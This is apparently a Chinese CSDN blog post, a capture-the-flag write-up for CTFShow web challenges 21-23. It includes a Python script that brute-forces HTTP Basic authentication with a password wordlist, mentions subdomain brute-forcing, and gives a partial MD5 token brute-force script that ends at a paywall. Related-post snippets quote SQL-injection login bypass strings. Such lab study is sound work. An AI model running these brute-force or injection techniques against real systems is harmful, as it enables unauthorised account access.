CTFShow-web入门WriteUp(长期更新)

最新推荐文章于 2024-04-29 01:18:24 发布
最新推荐文章于 2024-04-29 01:18:24 发布
阅读量582 收藏 2
点赞数 1
分类专栏: WriteUp 文章标签: php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43391509/article/details/115255023
版权

爆破

web21

下载zip文件是后台密码字典,用户名猜测admin,先进行抓包
抓包
没有发现我们传输的参数,但是HTTP请求头里面有这样的参数
在这里插入图片描述
解码之后发现这是我们传输的参数,所以开始爆破
因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可
在这里插入图片描述
然后对payload进行base64加密,进行爆破
在这里插入图片描述
在这里插入图片描述
这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码
在这里插入图片描述
或者写python脚本

# -*- coding: utf-8 -*-

import time
import requests
import base64

url = 'http://7bfc1cb5-875f-43c6-94aa-f71f94a7b6d2.challenge.ctf.show:8080/'

password = []

with open("1.txt", "r") as f:  
	while True:
	    data = f.readline() 
	    if data:
	    	password.append(data)
	    else:
	      break
	    


for p in password:
	strs = 'admin:'+ p[:-1]
	header={
   
		'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
	}
	rep =requests.get(url,headers=header)
	time.sleep(0.2)
	if rep.status_code ==200:
		print(rep.text)
		break

web22

提示进行域名爆破,用dirsearch爆破一下,flag.ctf.com
访问,网站GG了。。。。

web23

error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
   
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
   
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
   
            echo $flag;
        }
    }
}

关键在于对token的验证
1.对token进行md5加密之后进行截取
2.token的第12位、15位和17位必须相同
3.满足算式($_2 + $_15 + $_17) / $_2 === $_32
我们需要构造满足这些条件的md5,只能写脚本爆破

# -*- coding: utf-8 -*-

import hashlib
dic = '0123456789qazwsxedcrfvtgbyhnujmikolp'
for a in dic:
    for b in dic:
        t =
最低0.47元/天 解锁文章
子推
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件的读写基本操作
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
[ctfshow 2021摆烂杯] WEB部分 writeup
ShenZ的博客
01-24 1057
[ctfshow 2021摆烂杯] WEB部分 writeup web签到 一行代码 黑客网站 登陆不了 1.读一些敏感文件 2.利用web.xml写jsp???? 官方的wp:https://qgieod1s9b.feishu.cn/docs/doccnC4EpMhSv1Ni6mbL7BQQdBc
【CTF Reverse】CTFShow 逆向签到题 Writeup(反汇编)
最新发布
HEX9CF的技术博客
04-29 588
1逆向题的hello world。
easyphp(xctf)
m0_56107268的博客
11-13 561
php一些函数的绕过
CTFSHOW-web入门-信息搜集,爆破,命令执行
Yb_140的博客
02-19 4927
目录 Web入门 信息搜集 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 爆破 web21 web22 web23 web24 web25 web26 web27 web28 命令执行 web29 web30 web31 web32 web33 web34 web35 web36
WriteUp模板1
08-08
WriteUp模板1
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
PML-Prediction-Assignment-Writeup
05-31
在本项目中,“PML-Prediction-Assignment-Writeup-main”可能包含用于建模的数据集。 2. 数据预处理:数据预处理是任何建模任务的关键步骤,包括数据清洗(处理缺失值和异常值)、数据转换(如归一化或标准化)...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
2019.4 DDCTF web题--滴 writeup
04-14
这篇writeup涉及的是2019年4月的DDCTF(web)竞赛中的第一道题目——滴。这是一道关于Web安全和编码解码的挑战。让我们深入解析这个过程。 首先,URL `...
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
CTF show WEB10
羽的博客
02-17 4188
题目地址:https://ctf.show 打开页面点击取消按钮,出现源码。 $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 从源码中可以得知几乎把注入用到的关键词过滤的差不多了。 正则表达式中的 /i 表明无法大小写和双写绕过关键词。 ...
ctfshow 吃瓜杯八月赛 Misc WriteUp
Nancy523的博客
08-18 1075
目录 1、Misc游戏签到 2、吃瓜 3、EZbingo 4、魔王 5、Dinner of Cyanogen 6、Music Game 7、一群强盗 目录位置) 1、Misc游戏签到 别问 问就是玩游戏 套神说的) :多选杀戮 没有杀戮就选背刺 少选能量瓶子 吓死就对了^q^ 打了小几十把 脸黑没办法 期间遇到过环境卡死 3段flag闪退 环境罢工( 八神说 是python的错跟套神没关系呜呜呜 ctfshow{White_give_game_o...
html ctf查找,CTFSHOW的web部分writeup
weixin_31655833的博客
06-17 272
WEB2题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin‘or 1=1#(CTF中SQL万能密码集合)发现成功执行,于是order by查找回显数username=ctfshow‘ order by 3 #&password=1在3时正常回显,4是无回显,说明回显数为3使用union select 联合查询爆库名username=ctfshow‘ union selec...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5640
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1295
ctfshow phpCVE(web311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctfshow-web入门-爆破web25
HkD01L的博客
06-20 778
mt_srand()是伪随机,通过分发种子,如果有种子的话,生成随机数的值也是固定的,生成的值也和php的版本有关,ctfshow,web25,爆破
CTF日常训练WriteUp之CTF秀靶场
Javachichi的博客
02-11 984
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
ctfshow web80
09-21
根据提供的引用内容,ctfshow web80是一道CTF题目。关于该题目的具体解法和原理,我无法给出准确的答案,因为引用中...但是你可以参考九枕-ctfshow学习记录-web入门中的相关内容来了解更多关于ctfshow web80的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值